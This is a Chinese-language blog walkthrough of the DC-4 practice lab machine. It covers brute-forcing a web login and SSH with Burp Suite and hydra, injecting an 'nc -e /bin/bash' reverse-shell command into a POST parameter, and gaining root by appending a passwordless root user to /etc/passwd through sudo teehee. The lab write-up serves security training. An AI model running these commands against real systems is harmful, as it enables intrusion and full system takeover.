码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • DC-4 靶机


    DC_4

    信息搜集

    存活检测

    image-20231022204049659

    详细扫描

    image-20231022204104264

    后台网页扫描

    image-20231022204121041

    网页信息搜集

    image-20231022204148961

    只有一个登陆界面

    漏洞利用

    • 尝试使用 burpsuite 密码爆破

      尝试使用用户名 admin 登录管理员页面

    • 成功爆破出密码 happy

      image-20231022205656115

    • 登录管理员页面

      显示可以使用命令

      image-20231022205749930

    • 但只能使用三个命令

      image-20231022205835140

    • 继续使用 bp 拦截查看数据包

      发送到 Repeater 中进行调试

      image-20231022210030615

    • 可以观察到列出当前文件的指令铭文显示在 POST 传参中

      查看命令本应为 ls -l 而参数中的命令为 ls+-1,猜测此处应该使用 + 代替了空格

    • 尝试将命令修改为连接反弹 shell 的 命令

    • kali 开启 nc 监听

      nc -lvvp 7777
      
      • 1
    • 将抓取的命令修改为

      nc+-e+/bin/bash+10.4.7.146+7777
      
      • 1

      image-20231022210941206

    • 成功反弹

      image-20231022210959775

    ssh 密码爆破

    • 搜集有用信息

      在/home/jim/backups 目录下发现了旧密码文件

      image-20231022211410659

    • 将密码文件保存

    • 靶机开启 http 上传

      python3 -m http.server 8888
      
      • 1

      image-20231022211612326

    • kali 下载旧密码文件

      wget http://10.4.7.148:8888/old-passwords.bak
      
      • 1

      image-20231022211648896

    • hydra 密码爆破

      hydra -l jim -P old-passwords.bak ssh://10.4.7.148 -vV -f -I
      
      • 1
    • 成功爆破出 jim 的密码 jibril04

    • 登录

      ssh jim@10.4.7.148
      
      • 1

      image-20231022212144918

    提权

    • 尝试 sudo -l

      无 root 权限

      image-20231022212312307

    • 返回查看到登陆后收到了一封邮件

      image-20231022212630510

    • 查看邮箱

      image-20231022212730316

    • 邮箱是 Charles 发来的,并告知了他的密码 ^xHhA&hvim0y

    • 切换用户

    • 成功切换,sudo -l 查看权限

      image-20231022212947507

    • 可以使用 teehee 命令

    • 查看 teehee 命令的使用方式

      teehee --help
      
      • 1

      image-20231022213311584

    • 帮助中显示使用 teehee -a <文件> 可以向文件中追加内容

    • 尝试向 /etc/passwd 文件中追加一条 root 用户

      sudo /usr/bin/teehee -a /etc/passwd 
      
      • 1
      nb::0:0:root:/root:/bin/bash
      
      • 1

      image-20231022213936715

    • 切换创建的用户

      su nb
      
      • 1

      image-20231022214009533

      成功获取 root 权限

    总结

    • burpsuite 网页登录爆破
    • burpsuite 拦截修改数据包
    • hydra 爆破 ssh 密码
    • sudo 提权
    • 向 /etc/passwd 文件添加 root 用户
  • 相关阅读:
    基于国产 ARM + FPGA+Codesys运动控制平台的智能人机交互系统设计
    08Java算术运算符/除法与取模/隐式转换/强制转换/字符串相加/字符相加
    Ceph IO流程及数据分布
    Python基本数据类型简介(二)——数值运算操作符与数值运算函数
    程序员必须知道的八件事
    别再听中介忽悠了,用python找到最合适你的房子
    java全内容收集
    基于springboot实现智慧外贸平台系统【项目源码+论文说明】计算机毕业设计
    攀爬倒影发光方块
    上周热点回顾(6.27-7.3)
  • 原文地址:https://blog.csdn.net/weixin_51559599/article/details/133978808
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号